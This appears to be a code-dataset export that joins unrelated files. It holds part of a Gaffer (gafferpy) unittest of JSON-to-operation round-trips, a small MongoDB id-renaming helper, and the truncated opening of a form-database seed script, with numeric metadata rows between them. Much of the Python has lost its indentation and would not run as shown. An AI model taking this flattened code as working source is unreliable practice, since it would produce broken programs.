]
},
"edge2": {
"functions": [
{
"selection": [
"prop2"
],
"projection": [
"newProp2"
],
"function": {
"class": "exampleFunction"
}
}
]
}
},
"entities": {
"entity1": {
"functions": [
{
"selection": [
"prop"
],
"projection": [
"newProp"
],
"function": {
"class": "exampleFunction"
}
}
]
},
"entity2": {
"functions": [
{
"selection": [
"prop"
],
"projection": [
"newProp"
],
"function": {
"class": "exampleFunction"
}
}
]
}
}
}
]
}
''',
g.OperationChain(
operations=[
g.GetJobResults(
job_id="job1"
),
g.Transform(
entities=[
g.ElementTransformDefinition(
group="entity1",
functions=[
g.FunctionContext(
selection=["prop"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp"]
)
]
),
g.ElementTransformDefinition(
group="entity2",
functions=[
g.FunctionContext(
selection=["prop"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp"]
)
]
)
],
edges=[
g.ElementTransformDefinition(
group="edge1",
functions=[
g.FunctionContext(
selection=["prop2"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp2"]
)
]
),
g.ElementTransformDefinition(
group="edge2",
functions=[
g.FunctionContext(
selection=["prop2"],
function=g.Function(
class_name="exampleFunction"
),
projection=["newProp2"]
)
]
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ScoreOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}, {
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "namedOp"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
}
''',
g.ScoreOperationChain(
operation_chain=g.OperationChain(
operations=[
g.GetElements(),
g.NamedOperation(
operation_name='namedOp'
),
g.Limit(
truncate=True,
result_limit=3
)
]
)
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ScoreOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}, {
"class" : "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName" : "namedOp"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
} ]
}
}
''',
g.ScoreOperationChain(
operation_chain={
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}, {
"class": "uk.gov.gchq.gaffer.named.operation.NamedOperation",
"operationName": "namedOp"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit": 3,
"truncate": True
}]
}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.GetWalks",
"resultsLimit": 500000,
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 1
}],
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 2
}]
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 4
}]
}]
}]
}
''',
g.OperationChain(
operations=[
g.GetWalks(
results_limit=500000,
input=[
g.EntitySeed(
vertex=1
)
],
operations=[
g.GetElements(
input=[
g.EntitySeed(
vertex=2
)
]
),
g.GetElements(
input=[
g.EntitySeed(
vertex=4
)
]
)
]
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.GetWalks",
"operations" : [
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"BasicEdge" : {
"properties" : [ "count" ]
}
},
"entities" : { }
},
"directedType" : "DIRECTED",
"includeIncomingOutGoing" : "OUTGOING"
},
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"BasicEntity" : {
"postAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 3
},
"selection" : [ "property1" ]
} ]
}
}
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"BasicEdge" : {
"properties" : [ "count" ]
}
},
"entities" : { }
},
"directedType" : "DIRECTED",
"includeIncomingOutGoing" : "OUTGOING"
} ]
}, {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : { },
"entities" : {
"BasicEntity" : {
"postAggregationFilterFunctions" : [ {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsLessThan",
"orEqualTo" : false,
"value" : 3
},
"selection" : [ "property1" ]
} ]
}
}
}
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view" : {
"edges" : {
"BasicEdge" : {
"properties" : [ "count" ]
}
},
"entities" : { }
},
"directedType" : "DIRECTED",
"includeIncomingOutGoing" : "OUTGOING"
} ]
} ],
"resultsLimit" : 1000000,
"input" : [ {
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : "A"
} ]
}
''',
g.GetWalks(
results_limit=1000000,
operations=[
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
properties=[
"count"
],
group="BasicEdge"
)
]
),
directed_type="DIRECTED",
include_incoming_out_going="OUTGOING"
),
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
g.ElementDefinition(
post_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"property1"
],
predicate=g.IsLessThan(
or_equal_to=False,
value=3
)
)
],
group="BasicEntity"
)
],
edges=[
]
)
),
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
properties=[
"count"
],
group="BasicEdge"
)
]
),
directed_type="DIRECTED",
include_incoming_out_going="OUTGOING"
)
]
),
g.OperationChain(
operations=[
g.GetElements(
view=g.View(
entities=[
g.ElementDefinition(
post_aggregation_filter_functions=[
g.PredicateContext(
selection=[
"property1"
],
predicate=g.IsLessThan(
or_equal_to=False,
value=3
)
)
],
group="BasicEntity"
)
],
edges=[
]
)
),
g.GetElements(
view=g.View(
entities=[
],
edges=[
g.ElementDefinition(
properties=[
"count"
],
group="BasicEdge"
)
]
),
directed_type="DIRECTED",
include_incoming_out_going="OUTGOING"
)
]
)
],
input=[
g.EntitySeed(
vertex="A"
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [
{
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [
{
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
},
{
"class" : "uk.gov.gchq.gaffer.operation.impl.Limit",
"resultLimit" : 3,
"truncate" : true
}
]
}
],
"options": {
"key1": "value1"
}
}
''',
g.OperationChain(
operations=[
g.OperationChain(
operations=[
g.GetElements(),
g.Limit(result_limit=3, truncate=True)
]
)
],
options={"key1": "value1"}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.store.operation.GetSchema",
"compact": true
}
''',
g.GetSchema(
compact=True
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.GetWalks",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view": {
"edges": {
"JunctionLocatedAt": {}
},
"entities": {}
}
},
{
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"view": {
"edges": {
"RoadUse": {}
},
"entities": {}
}
}
],
"resultsLimit": 10000,
"input": [{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": 293020
}]
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.Map",
"functions": [{
"class": "uk.gov.gchq.koryphe.impl.function.IterableFunction",
"functions": [{
"class": "uk.gov.gchq.gaffer.data.graph.function.walk.ExtractWalkEdgesFromHop",
"hop": 1
}, {
"class": "uk.gov.gchq.koryphe.impl.function.FirstItem"
}]
}]
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.output.ToVertices",
"useMatchedVertex": "EQUAL",
"edgeVertices": "SOURCE"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.output.ToSet"
}]
}
''',
g.OperationChain(
operations=[
g.GetWalks(
results_limit=10000,
input=[
g.EntitySeed(
vertex=293020
)
],
operations=[
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="JunctionLocatedAt"
)
],
entities=[]
)
),
g.GetElements(
view=g.View(
edges=[
g.ElementDefinition(
group="RoadUse"
)
],
entities=[]
)
)
]
),
g.Map(
functions=[
g.IterableFunction(
functions=[
g.ExtractWalkEdgesFromHop(
hop=1),
g.FirstItem()
]
)
]
),
g.ToVertices(
use_matched_vertex="EQUAL",
edge_vertices="SOURCE"
),
g.ToSet()
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.SplitStoreFromFile",
"inputPath": "path/to/file"
}
''',
g.SplitStoreFromFile(
input_path="path/to/file"
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.SplitStoreFromIterable",
"input": [
"1", "2", "3"
]
}
''',
g.SplitStoreFromIterable(
input=[
"1", "2", "3"
]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.SampleElementsForSplitPoints",
"input" : [ {
"group" : "entity",
"vertex" : 6,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Entity"
}, {
"group" : "edge",
"source" : 5,
"destination" : 6,
"directed" : true,
"properties" : {
"count" : 1
},
"class" : "uk.gov.gchq.gaffer.data.element.Edge"
} ],
"numSplits": 5,
"proportionToSample": 0.1
}
''',
g.SampleElementsForSplitPoints(
input=[
g.Entity(
vertex=6,
properties={'count': 1},
group="entity"
),
g.Edge(
destination=6,
source=5,
group="edge",
properties={'count': 1},
directed=True
)
],
num_splits=5,
proportion_to_sample=0.1
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.If",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Entity",
"group" : "entity",
"vertex" : "a1",
"properties" : {
"count" : 5
}
}],
"conditional" : {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value" : 3,
"orEqualTo" : true
},
"transform" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.Map",
"functions" : [
{
"class" : "uk.gov.gchq.gaffer.data.element.function.ExtractProperty",
"name" : "count"
}
]
}
},
"then" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds"
},
"otherwise" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAllElements"
}
}
''',
g.If(
input=g.Entity(
group='entity',
vertex='a1',
properties={
'count': 5
}
),
conditional=g.Conditional(
predicate=g.IsMoreThan(
value=3,
or_equal_to=True
),
transform=g.Map(
functions=[
g.ExtractProperty(
name='count'
)
]
)
),
then=g.GetAdjacentIds(),
otherwise=g.GetAllElements()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.view.AddNamedView",
"name" : "testNamedView",
"description" : "example test NamedView",
"view" : {
"edges" : {
"testEdge" : { }
}
},
"overwriteFlag" : true,
"writeAccessRoles" : [ "auth1", "auth2" ]
}
''',
g.AddNamedView(
name='testNamedView',
description='example test NamedView',
view=g.View(
edges=[
g.ElementDefinition(
group='testEdge'
)]
),
overwrite_flag=True,
write_access_roles=['auth1', 'auth2']
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.named.view.AddNamedView",
"view" : {
"edges" : {
"testEdge" : {
"preAggregationFilterFunctions" : [ {
"selection" : [ "count" ],
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value" : "${countThreshold}"
}
} ]
}
}
},
"name" : "isMoreThan",
"description" : "is more than",
"parameters" : {
"countThreshold" : {
"valueClass" : "Long",
"required" : false,
"description" : "count threshold",
"defaultValue" : 1
}
},
"overwriteFlag" : true,
"writeAccessRoles" : [ "auth1", "auth2" ]
}
''',
g.AddNamedView(
name='isMoreThan',
description='is more than',
view=g.View(
edges=[
g.ElementDefinition(
group='testEdge',
pre_aggregation_filter_functions=[
g.PredicateContext(
selection='count',
predicate=g.IsMoreThan(
value="${countThreshold}"
)
)
]
)]
),
parameters=[
g.NamedViewParameter(
name="countThreshold",
description="count threshold",
default_value=1,
value_class="Long",
required=False
)
],
overwrite_flag=True,
write_access_roles=['auth1', 'auth2']
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.RemoveGraph",
"graphId" : "graph1"
}
''',
g.RemoveGraph(
graph_id="graph1"
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.GetAllGraphIds"
}
''',
g.GetAllGraphIds()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.GetAllGraphInfo"
}
''',
g.GetAllGraphInfo()
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.AddGraph",
"graphId" : "graph1",
"isPublic" : false,
"schema" : {
"edges" : {
"RoadHasJunction" : {
"description" : "A directed edge from each road to all the junctions on that road.",
"source" : "road",
"destination" : "junction",
"directed" : "true",
"properties" : { },
"groupBy" : [ ]
}
},
"types" : {
"junction" : {
"description" : "A road junction represented by a String.",
"class" : "String"
},
"road" : {
"description" : "A road represented by a String.",
"class" : "String"
}
}
},
"storeProperties" : {
"gaffer.store.class" : "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class" : "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
}
}
''',
g.AddGraph(
graph_id="graph1",
is_public=False,
schema={
"edges": {
"RoadHasJunction": {
"description": "A directed edge from each road to all the junctions on that road.",
"source": "road",
"destination": "junction",
"directed": "true",
"properties": {},
"groupBy": []
}
},
"types": {
"junction": {
"description": "A road junction represented by a String.",
"class": "String"
},
"road": {
"description": "A road represented by a String.",
"class": "String"
}
}
},
store_properties={
"gaffer.store.class": "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class": "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.AddGraphWithHooks",
"graphId" : "graph1",
"isPublic" : false,
"schema" : {
"edges" : {
"RoadHasJunction" : {
"description" : "A directed edge from each road to all the junctions on that road.",
"source" : "road",
"destination" : "junction",
"directed" : "true",
"properties" : { },
"groupBy" : [ ]
}
},
"types" : {
"junction" : {
"description" : "A road junction represented by a String.",
"class" : "String"
},
"road" : {
"description" : "A road represented by a String.",
"class" : "String"
}
}
},
"storeProperties" : {
"gaffer.store.class" : "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class" : "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
},
"hooks": [
{
"class": "uk.gov.gchq.gaffer.graph.hook.Log4jLogger"
}
]
}
''',
g.AddGraphWithHooks(
graph_id="graph1",
is_public=False,
schema={
"edges": {
"RoadHasJunction": {
"description": "A directed edge from each road to all the junctions on that road.",
"source": "road",
"destination": "junction",
"directed": "true",
"properties": {},
"groupBy": []
}
},
"types": {
"junction": {
"description": "A road junction represented by a String.",
"class": "String"
},
"road": {
"description": "A road represented by a String.",
"class": "String"
}
}
},
store_properties={
"gaffer.store.class": "uk.gov.gchq.gaffer.mapstore.SingleUseMapStore",
"gaffer.cache.service.class": "uk.gov.gchq.gaffer.cache.impl.HashMapCacheService"
},
hooks=[{
"class": "uk.gov.gchq.gaffer.graph.hook.Log4jLogger"
}]
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.federatedstore.operation.ChangeGraphAccess",
"graphId": "example_graph_id",
"graphAuths": ["Auth_1", "Auth_2"],
"ownerUserId": "example_user_id",
"isPublic": true,
"disabledByDefault": false
}
''',
g.ChangeGraphAccess(
graph_id="example_graph_id",
graph_auths=["Auth_1", "Auth_2"],
owner_user_id="example_user_id",
is_public=True,
disabled_by_default=False
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.While",
"maxRepeats" : 5,
"input" : [
{
"class" : "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex" : 2
}
],
"condition" : true,
"operation" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetAdjacentIds"
}
}
''',
g.While(
max_repeats=5,
input=[
g.EntitySeed(
vertex=2
)
],
condition=True,
operation=g.GetAdjacentIds()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.While",
"maxRepeats" : 10,
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}],
"conditional" : {
"predicate" : {
"class" : "uk.gov.gchq.koryphe.impl.predicate.IsMoreThan",
"value" : 2
},
"transform" : {
"class" : "uk.gov.gchq.gaffer.operation.impl.Map",
"functions" : [{
"class" : "uk.gov.gchq.gaffer.data.element.function.ExtractProperty",
"name" : "count"
}
]
}
},
"operation" : {"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"}
}
''',
g.While(
max_repeats=10,
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
],
conditional=g.Conditional(
predicate=g.IsMoreThan(
value=2
),
transform=g.Map(
functions=[
g.ExtractProperty(
name="count"
)
]
)
),
operation=g.GetElements()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.store.operation.GetTraits",
"currentTraits" : true
}
''',
g.GetTraits(
current_traits=True
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.Reduce",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}],
"aggregateFunction": {
"class": "uk.gov.gchq.koryphe.impl.binaryoperator.Max"
},
"identity": 10
}
''',
g.Reduce(
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
],
aggregate_function=g.BinaryOperator(
class_name="uk.gov.gchq.koryphe.impl.binaryoperator.Max"
),
identity=10
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ForEach",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}],
"operation": {"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"}
}
''',
g.ForEach(
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
],
operation=g.GetElements()
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.output.ToSingletonList",
"input" : [{
"class" : "uk.gov.gchq.gaffer.data.element.Edge",
"group" : "testEdge",
"source" : "src",
"destination" : "dest",
"directed" : true,
"properties" : {
"count" : 3
}
}]
}
''',
g.ToSingletonList(
input=[
g.Edge(
group="testEdge",
source="src",
destination="dest",
directed=True,
properties={
"count": 3
}
)
]
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ValidateOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
} ]
},
"options" : {
"key" : "value"
}
}
''',
g.ValidateOperationChain(
operation_chain=g.OperationChain(
operations=[
g.AddElements(),
g.GetElements()
]
),
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.ValidateOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
} ]
},
"options" : {
"key" : "value"
}
}
''',
g.ValidateOperationChain(
operation_chain={
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}]
},
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.SetVariable",
"input" : "testVal",
"variableName" : "testVarName",
"options" : {
"key" : "value"
}
}
''',
g.SetVariable(
input="testVal",
variable_name="testVarName",
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.GetVariable",
"variableName" : "testVarName",
"options" : {
"key" : "value"
}
}
''',
g.GetVariable(
variable_name="testVarName",
options={
"key": "value"
}
)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.operation.impl.GetVariables",
"variableNames" : ["testVarName", "testVarName2"],
"options" : {
"key" : "value"
}
}
''',
g.GetVariables(
variable_names=["testVarName", "testVarName2"],
options={
"key": "value"
}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.join.Join",
"input": [ "test2" ],
"operation": {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [
{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": "test"
}
]
},
"matchMethod": {
"class": "uk.gov.gchq.gaffer.store.operation.handler.join.match.ElementMatch"
},
"flatten": false,
"joinType": "INNER",
"collectionLimit": 10
}
''',
g.Join(
input=['test2'],
operation=g.GetElements(input=[g.EntitySeed('test')]),
match_method=g.ElementMatch(),
flatten=False,
join_type=g.JoinType.INNER,
collection_limit=10)
],
[
'''
{
"class" : "uk.gov.gchq.gaffer.federatedstore.operation.FederatedOperationChain",
"operationChain" : {
"class" : "uk.gov.gchq.gaffer.operation.OperationChain",
"operations" : [ {
"class" : "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class" : "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
} ]
},
"options" : {
"key" : "value"
}
}
''',
g.FederatedOperationChain(
operation_chain={
"class": "uk.gov.gchq.gaffer.operation.OperationChain",
"operations": [{
"class": "uk.gov.gchq.gaffer.operation.impl.add.AddElements"
}, {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements"
}]
},
options={
"key": "value"
}
)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.join.Join",
"input": [ "test2" ],
"operation": {
"class": "uk.gov.gchq.gaffer.operation.impl.get.GetElements",
"input": [
{
"class": "uk.gov.gchq.gaffer.operation.data.EntitySeed",
"vertex": "test"
}
]
},
"matchMethod": {
"class": "uk.gov.gchq.gaffer.store.operation.handler.join.match.KeyFunctionMatch",
"firstKeyFunction": {
"class": "uk.gov.gchq.gaffer.data.element.function.ExtractId",
"id": "DESTINATION"
}
},
"matchKey": "RIGHT",
"flatten": false,
"joinType": "OUTER"
}
''',
g.Join(
input=['test2'],
operation=g.GetElements(input=[g.EntitySeed('test')]),
match_method=g.KeyFunctionMatch(first_key_function=g.ExtractId("DESTINATION")),
match_key=g.MatchKey.RIGHT,
flatten=False,
join_type=g.JoinType.OUTER)
],
[
'''
{
"class": "uk.gov.gchq.gaffer.operation.impl.job.CancelScheduledJob",
"jobId": "238492-2ad-fadf034-324-2a"
}
''',
g.CancelScheduledJob(job_id="238492-2ad-fadf034-324-2a")
]
]
def test_operations(self):
    """Round-trip every (json, operation) example pair.

    Each entry in ``self.examples`` is a two-element list: the reference
    JSON string and the equivalent python operation object. The operation
    must serialise to exactly the reference JSON, and the reference JSON
    must deserialise without validation errors.
    """
    self.maxDiff = None
    for json_string, operation in self.examples:
        # Serialising the python operation must match the reference JSON.
        self.assertEqual(
            json.loads(json_string),
            operation.to_json(),
            "json failed: \n" + json_string + "\n"
            + operation.to_json_pretty_str()
        )
        # The reference JSON must also parse back through the converter.
        g.JsonConverter.from_json(json_string, validate=True)
def test_get_elements_should_handle_single_inputs(self):
self.assertEqual(
{
'class': 'uk.gov.gchq.gaffer.operation.impl.get.GetElements',
'input': [
{
'class': 'uk.gov.gchq.gaffer.operation.data.EntitySeed',
'vertex': 'value'
}
]
},
g.GetElements(input="value").to_json())
# Allow running this test module directly from the command line.
if __name__ == "__main__":
    unittest.main()
| 36.948862
| 124
| 0.299456
| 9,675
| 197,972
| 6.088165
| 0.056744
| 0.043716
| 0.078689
| 0.118364
| 0.89133
| 0.874743
| 0.85943
| 0.828634
| 0.787889
| 0.764307
| 0
| 0.009994
| 0.602227
| 197,972
| 5,357
| 125
| 36.955759
| 0.738
| 0.002814
| 0
| 0.623794
| 0
| 0
| 0.066957
| 0.027585
| 0
| 0
| 0
| 0
| 0.000715
| 1
| 0.000715
| false
| 0.000357
| 0.001072
| 0
| 0.002501
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4335222efb0465d4791d48da750c3cc90a7d3d3d
| 190
|
py
|
Python
|
snuggle/data/models/mongo/util.py
|
halfak/snuggle
|
384818aaf8a783013b076ada3c74226f10e5dc18
|
[
"MIT"
] | 2
|
2021-04-26T20:34:25.000Z
|
2021-11-12T11:26:57.000Z
|
snuggle/data/models/mongo/util.py
|
halfak/snuggle
|
384818aaf8a783013b076ada3c74226f10e5dc18
|
[
"MIT"
] | null | null | null |
snuggle/data/models/mongo/util.py
|
halfak/snuggle
|
384818aaf8a783013b076ada3c74226f10e5dc18
|
[
"MIT"
] | null | null | null |
def mongoify(doc):
    """Rename a document's 'id' key to MongoDB's '_id' key, in place.

    :param doc: dict-like document; mutated in place
    :return: the same document, for convenient chaining
    """
    if 'id' in doc:
        # pop() moves the value in one step instead of copy-then-delete.
        doc['_id'] = doc.pop('id')
    return doc
def demongoify(doc):
    """Rename a document's MongoDB '_id' key back to 'id', in place.

    Inverse of :func:`mongoify`.

    :param doc: dict-like document; mutated in place
    :return: the same document, for convenient chaining
    """
    if "_id" in doc:
        # pop() moves the value in one step instead of copy-then-delete.
        doc['id'] = doc.pop('_id')
    return doc
| 11.875
| 24
| 0.557895
| 32
| 190
| 3.1875
| 0.28125
| 0.294118
| 0.137255
| 0.176471
| 0.764706
| 0.764706
| 0.764706
| 0.764706
| 0.764706
| 0.764706
| 0
| 0
| 0.242105
| 190
| 15
| 25
| 12.666667
| 0.708333
| 0
| 0
| 0.2
| 0
| 0
| 0.10582
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.2
| false
| 0
| 0
| 0
| 0.4
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
433ca49fbb8adbfb98950177982e2a2a5ef07eec
| 4,551
|
py
|
Python
|
admin/modelos/formularios_db.py
|
CIDGUN/unexpo
|
cc1220f641087e65b4678d17c45426794c1615ea
|
[
"Apache-2.0"
] | null | null | null |
admin/modelos/formularios_db.py
|
CIDGUN/unexpo
|
cc1220f641087e65b4678d17c45426794c1615ea
|
[
"Apache-2.0"
] | null | null | null |
admin/modelos/formularios_db.py
|
CIDGUN/unexpo
|
cc1220f641087e65b4678d17c45426794c1615ea
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# Seed script: declares the form tables and loads their initial rows.
try:
    # Preferred layout: zdb installed inside the ztec package.
    from ztec.zdb import DB
except ImportError:
    # Fallback for a flat layout where zdb.py sits directly on the path.
    # (Was a bare `except:`, which would also swallow KeyboardInterrupt
    # and real errors raised while importing ztec.zdb.)
    from zdb import DB
db=DB()
db.load=True
# Column declarations. The positional campo() arguments mirror the zdb
# helper's signature — NOTE(review): exact meaning of the flag/limit
# arguments comes from zdb and is not visible here; confirm against zdb.
db('Formularios').campo('Nombre',db.str,False,True,False,False,0,-1,None,None)
db('Formularios').campo('Contenido',db.list,False,True,False,False,0,-1,None,None)
db('Formularios').campo('args',db.dict,False,True,False,False,0,-1,None,None)
db('Formularios').campo('Fecha',db.str,False,True,False,False,0,-1,None,'%d/%m/%Y %H:%M:%S')
db('Formularios').campo('Status',db.list,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('Nombre',db.str,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('Contenido',db.list,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('args',db.dict,False,True,False,False,0,-1,None,None)
db('Post-de-Formulario').campo('Fecha',db.str,False,True,False,False,0,-1,None,'%d/%m/%Y %H:%M:%S')
db('Post-de-Formulario').campo('Status',db.list,False,True,False,False,0,-1,None,None)
db('Opciones').campo('Nombre',db.str,False,True,False,False,0,-1,None,None)
db('Opciones').campo('Valores',db.list,False,True,False,False,0,-1,None,None)
# Initial data: one rental-prospects form definition, its option lists,
# and one example submitted post.
